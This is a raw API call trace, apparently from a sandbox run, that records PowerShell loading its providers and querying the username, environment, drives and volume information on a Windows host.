	[0228.404] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x0) returned 0x2
	[0228.404] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x3d0) returned 0x0
	[0228.405] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x0) returned 0x2
	[0228.405] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x3d4) returned 0x0
	[0228.405] RegOpenKeyExW (in: hKey=0x3d4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x0) returned 0x2
	[0228.405] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x3d8) returned 0x0
	[0228.405] RegOpenKeyExW (in: hKey=0x3d8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x0) returned 0x2
	[0228.406] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x3dc) returned 0x0
	[0228.406] RegOpenKeyExW (in: hKey=0x3dc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e420 | out: phkResult=0x29e420*=0x3e0) returned 0x0
	[0228.406] RegCloseKey (hKey=0x3e0) returned 0x0
	[0228.406] RegCloseKey (hKey=0x3bc) returned 0x0
	[0228.407] RegCloseKey (hKey=0x3dc) returned 0x0
	[0228.410] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4ea0004
	[0228.544] GetLastError () returned 0x0
	[0228.546] ReportEventW (hEventLog=0x4ea0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33c68b8*="WSMan", lpRawData=0x33c6760) returned 1
	[0228.548] GetLastError () returned 0x0
	[0228.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.549] GetLastError () returned 0xcb
	[0228.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.550] GetLastError () returned 0xcb
	[0228.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.550] GetLastError () returned 0xcb
	[0228.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.550] GetLastError () returned 0xcb
	[0228.551] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7a4a48, nSize=0x29e594 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x29e594) returned 0x1
	[0228.551] GetLastError () returned 0xcb
	[0228.552] GetUserNameW (in: lpBuffer=0x7a4288, pcbBuffer=0x29e59c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29e59c) returned 1
	[0228.552] ReportEventW (hEventLog=0x4ea0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33ca794*="Alias", lpRawData=0x33ca650) returned 1
	[0228.553] GetLastError () returned 0x0
	[0228.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.554] GetLastError () returned 0xcb
	[0228.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.555] GetLastError () returned 0xcb
	[0228.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.555] GetLastError () returned 0xcb
	[0228.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.556] GetLastError () returned 0xcb
	[0228.556] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7a4a48, nSize=0x29e594 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x29e594) returned 0x1
	[0228.556] GetLastError () returned 0xcb
	[0228.556] GetUserNameW (in: lpBuffer=0x7a4288, pcbBuffer=0x29e59c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29e59c) returned 1
	[0228.557] ReportEventW (hEventLog=0x4ea0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33ce728*="Environment", lpRawData=0x33ce5e4) returned 1
	[0228.558] GetLastError () returned 0x0
	[0228.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.559] GetLastError () returned 0xcb
	[0228.560] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0228.560] GetLastError () returned 0xcb
	[0228.560] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0228.561] GetLastError () returned 0xcb
	[0228.561] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x29e0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0228.561] GetLastError () returned 0xcb
	[0228.561] SetErrorMode (uMode=0x1) returned 0x1
	[0228.561] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x29e544 | out: lpFileInformation=0x29e544*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.561] GetLastError () returned 0xcb
	[0228.561] SetErrorMode (uMode=0x1) returned 0x1
	[0228.562] GetLogicalDrives () returned 0x4
	[0228.562] GetLastError () returned 0xcb
	[0228.563] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29dfe8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.563] GetLastError () returned 0xcb
	[0228.564] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0228.564] GetLastError () returned 0xcb
	[0228.564] SetErrorMode (uMode=0x1) returned 0x1
	[0228.567] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x7a4388, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x29e510, lpMaximumComponentLength=0x29e50c, lpFileSystemFlags=0x29e508, lpFileSystemNameBuffer=0x7a4288, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x29e510*=0x9c354b42, lpMaximumComponentLength=0x29e50c*=0xff, lpFileSystemFlags=0x29e508*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0228.567] GetLastError () returned 0xcb
	[0228.567] SetErrorMode (uMode=0x1) returned 0x1
	[0228.567] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0228.567] GetLastError () returned 0xcb
	[0228.568] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29e070, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.568] GetLastError () returned 0xcb
	[0228.568] SetErrorMode (uMode=0x1) returned 0x1
	[0228.568] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x33cf960 | out: lpFileInformation=0x33cf960*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.568] GetLastError () returned 0xcb
	[0228.568] SetErrorMode (uMode=0x1) returned 0x1
	[0228.568] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29e070, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.568] GetLastError () returned 0xcb
	[0228.568] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29dffc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.568] GetLastError () returned 0xcb
	[0228.568] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0228.568] GetLastError () returned 0xcb
	[0228.570] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29dfb8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.570] GetLastError () returned 0xcb
	[0228.570] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0228.570] GetLastError () returned 0xcb
	[0228.571] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.571] GetLastError () returned 0xcb
	[0228.571] SetErrorMode (uMode=0x1) returned 0x1
	[0228.572] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x33d05b8 | out: lpFileInformation=0x33d05b8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.572] GetLastError () returned 0xcb
	[0228.572] SetErrorMode (uMode=0x1) returned 0x1
	[0228.572] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.572] GetLastError () returned 0xcb
	[0228.572] SetErrorMode (uMode=0x1) returned 0x1
	[0228.572] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x33d0708 | out: lpFileInformation=0x33d0708*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.572] GetLastError () returned 0xcb
	[0228.572] SetErrorMode (uMode=0x1) returned 0x1
	[0228.572] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29e00c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.573] GetLastError () returned 0xcb
	[0228.573] SetErrorMode (uMode=0x1) returned 0x1
	[0228.573] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x33d08a8 | out: lpFileInformation=0x33d08a8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.573] GetLastError () returned 0xcb
	[0228.573] SetErrorMode (uMode=0x1) returned 0x1
	[0228.573] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7a4a48, nSize=0x29e594 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x29e594) returned 0x1
	[0228.573] GetLastError () returned 0xcb
	[0228.574] GetUserNameW (in: lpBuffer=0x7a4288, pcbBuffer=0x29e59c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29e59c) returned 1
	[0228.575] ReportEventW (hEventLog=0x4ea0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33d3630*="FileSystem", lpRawData=0x33d34ec) returned 1
	[0228.576] GetLastError () returned 0x0
	[0228.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.577] GetLastError () returned 0xcb
	[0228.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.578] GetLastError () returned 0xcb
	[0228.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.578] GetLastError () returned 0xcb
	[0228.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.578] GetLastError () returned 0xcb
	[0228.579] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7a4a48, nSize=0x29e594 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x29e594) returned 0x1
	[0228.672] GetLastError () returned 0xcb
	[0228.672] GetUserNameW (in: lpBuffer=0x7a4288, pcbBuffer=0x29e59c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29e59c) returned 1
	[0228.672] ReportEventW (hEventLog=0x4ea0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33d7720*="Function", lpRawData=0x33d75dc) returned 1
	[0228.806] GetLastError () returned 0x0
	[0228.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.810] GetLastError () returned 0xcb
	[0228.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfa8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.815] GetLastError () returned 0xcb
	[0228.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.815] GetLastError () returned 0xcb
	[0228.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.815] GetLastError () returned 0xcb
	[0228.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.815] GetLastError () returned 0xcb
	[0228.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfa8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.996] GetLastError () returned 0xcb
	[0228.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.996] GetLastError () returned 0xcb
	[0228.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.996] GetLastError () returned 0xcb
	[0228.997] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7a4a48, nSize=0x29e594 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x29e594) returned 0x1
	[0228.998] GetLastError () returned 0xcb
	[0228.998] GetUserNameW (in: lpBuffer=0x7a4288, pcbBuffer=0x29e59c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29e59c) returned 1
	[0228.998] ReportEventW (hEventLog=0x4ea0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33f07dc*="Registry", lpRawData=0x33f0698) returned 1
	[0229.134] GetLastError () returned 0x0
	[0229.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.136] GetLastError () returned 0x0
	[0229.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.136] GetLastError () returned 0x0
	[0229.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29df44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.136] GetLastError () returned 0x0
	[0229.137] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7a4a48, nSize=0x29e594 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x29e594) returned 0x1
	[0229.137] GetLastError () returned 0x0
	[0229.137] GetUserNameW (in: lpBuffer=0x7a4288, pcbBuffer=0x29e59c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29e59c) returned 1
	[0229.138] ReportEventW (hEventLog=0x4ea0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33f45c4*="Variable", lpRawData=0x33f4480) returned 1
	[0229.138] GetLastError () returned 0x0
	[0229.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.140] GetLastError () returned 0xcb
	[0229.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.143] GetLastError () returned 0xcb
	[0229.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29df94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0229.144] GetLastError () returned 0xcb
	[0229.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29df44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0229.144] GetLastError () returned 0xcb
	[0229.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29df44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0229.144] GetLastError () returned 0xcb
	[0229.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29df44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0229.145] GetLastError () returned 0xcb
	[0229.380] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7a4a48, nSize=0x29e594 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x29e594) returned 0x1
	[0229.508] GetLastError () returned 0x3
	[0229.509] GetUserNameW (in: lpBuffer=0x7a4288, pcbBuffer=0x29e59c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29e59c) returned 1
	[0229.510] ReportEventW (hEventLog=0x4ea0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34024b0*="Certificate", lpRawData=0x340236c) returned 1
	[0229.618] GetLastError () returned 0x0
	[0229.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.633] GetLastError () returned 0xcb
	[0229.638] GetLogicalDrives () returned 0x4
	[0229.638] GetLastError () returned 0xcb
	[0229.638] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29e10c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0229.638] GetLastError () returned 0xcb
	[0229.638] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0229.639] GetLastError () returned 0xcb
	[0229.640] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x7a4288 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0229.640] GetLastError () returned 0xcb
	[0229.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.641] GetLastError () returned 0xcb
	[0229.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.642] GetLastError () returned 0xcb
	[0229.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.811] GetLastError () returned 0xcb
	[0229.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.815] GetLastError () returned 0xcb
	[0229.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x29df54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
